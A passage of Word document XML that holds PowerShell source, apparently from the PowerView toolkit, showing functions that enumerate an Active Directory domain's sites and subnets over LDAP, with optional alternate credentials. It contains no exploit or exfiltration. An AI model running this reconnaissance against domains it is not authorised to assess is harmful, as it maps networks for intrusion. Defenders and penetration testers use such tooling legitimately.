        <w:t xml:space="preserve">        if($SiteSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23973DE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C2EAFF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($GUID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262189E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if we're filtering for a GUID in .gplink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB3F712" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $SiteSearcher.filter="(&amp;(objectCategory=site)(name=$SiteName)(gplink=*$GUID*))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661A686B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E24CCE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D49ED2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $SiteSearcher.filter="(&amp;(objectCategory=site)(name=$SiteName))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDD91EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E339D9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D32878D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6686D4D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results = $SiteSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9FDA73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C5D45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($FullData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE304B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F37F854" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Site = Convert-LDAPProperty -Properties $_.Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513E9C49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Site.PSObject.TypeNames.Add('PowerView.Site')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE7A67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AAB21C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497FBD34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A5659" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # otherwise just return the site name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F61BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $_.properties.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F5351F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A03DF93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A4C0E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38882D3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $SiteSearcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C4B29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C411B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA8126" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E396E90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C536966" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FF34DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BCEB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F560073" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="715BF791" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="703573ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetSubnet {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAD4DD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C905653" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C757D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4843ECE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Gets a list of all current subnets in a domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E3AE4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69A2F17A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SiteName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B16BB00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2210B523" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Only return subnets from the specified SiteName.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7601B3C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A5B2F70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5737BA9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0FFF44ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for subnets, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F03DF6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="629F8D06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF20802" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6929EC9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08677CF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0530A941" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D9E094" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F896FEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369788A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E613E6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A52023" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10CEA347" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return full subnet objects instead of just object names (the default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625A95FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4838D16B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C6CCCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53AB2FD5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6956DF09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44B7423F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45754CE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4013B725" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65EAFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F50956" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A73F3C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5BAA01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1095AF40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetSubnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5970D748" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FFC55D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all subnet names in the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67436350" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F45EECC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6CFD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29BF583F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetSubnet -Domain testlab.local -FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA94221" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745AAC46" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the full data objects for all subnets in testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558FF3C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8857B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F98C378" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FA5D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD9FB61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D7CA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F3BFEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SiteName = "*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C16B5D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E4B1BFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E017F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570C225A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="078EBFE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A648EEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC1907" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06E8EFD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31460431" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661B93A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AFC754A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C68E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FullData,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC06725" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C419D07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C32044A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DB5030" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A04250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="141CE117" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F3E3BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51745580" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700DDCC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7749D431" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665E4A05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $SubnetSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -ADSprefix "CN=Subnets,CN=Sites,CN=Configuration" -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4A8326" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279620C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="457408D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F843A29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($SubnetSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB7FBC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5341F22E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $SubnetSearcher.filter="(&amp;(objectCategory=subnet))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F4AB19" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C54B67E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EA0CDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results = $SubnetSearcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC5553" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C621F3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($FullData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B54D840" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # convert/process the LDAP fields for each result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8E378" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        Convert-LDAPProperty -Properties $_.Properties | Where-Object { $_.siteobject -match "CN=$SiteName" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273B52BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E18522" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBD41D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # otherwise just return the subnet name and site name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3693C2CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if ( ($SiteName -and ($_.properties.siteobject -match "CN=$SiteName,")) -or ($SiteName -eq '*')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA50950" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F632FE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $SubnetProperties = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31BC0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                'Subnet' = $_.properties.name[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E08710C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E5E541" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298A6E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $SubnetProperties['Site'] = ($_.properties.siteobject[0]).split(",")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554715C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231A44F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D36B07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                $SubnetProperties['Site'] = 'Error'</w:t>
      </w:r>
    </w:p>
